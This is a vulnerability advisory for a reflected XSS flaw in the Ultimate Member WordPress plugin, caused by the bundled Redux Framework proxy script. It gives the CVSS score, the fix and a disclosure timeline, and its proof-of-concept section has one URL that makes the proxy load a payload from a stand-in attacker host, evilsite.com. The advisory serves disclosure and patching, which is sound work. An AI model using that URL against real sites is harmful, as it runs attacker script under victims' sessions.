Ultimate Member 1.2.98-1.2.997, Reflected XSS
The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this location is then output on the target domain, and as such JavaScript is executed under the context of the current user of the site.
Homepage
https://wordpress.org/plugins/ultimate-member/
CVSS Score
5.8
CSSS Vector
(AV:N/AC:M/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 1.3.0
Proof of Concept
If a user of the target site can be tricked into visiting the following URL (the page specified in the ‘url’ parameter would contain your XSS payload), then the HTML/JS within the target page will be executed under the context of the current user.
http://localhost/wp-admin/admin-ajax.php?action=redux_p&url=http://evilsite.com/xss-payload.html
Timeline
- 2015-05-18: Discovered
- 2015-05-18: Vendor notified
- 2015-05-18: Vendor responded
- 2015-06-11: Version 1.2.996 released – issue resolved
- 2015-06-18: Advisory released
- 2015-06-22: Notified that issue has in fact not been resolved – Vendor notified
- 2015-7-07: Version 1.3.0 released – issue resolved (Redux framework updated)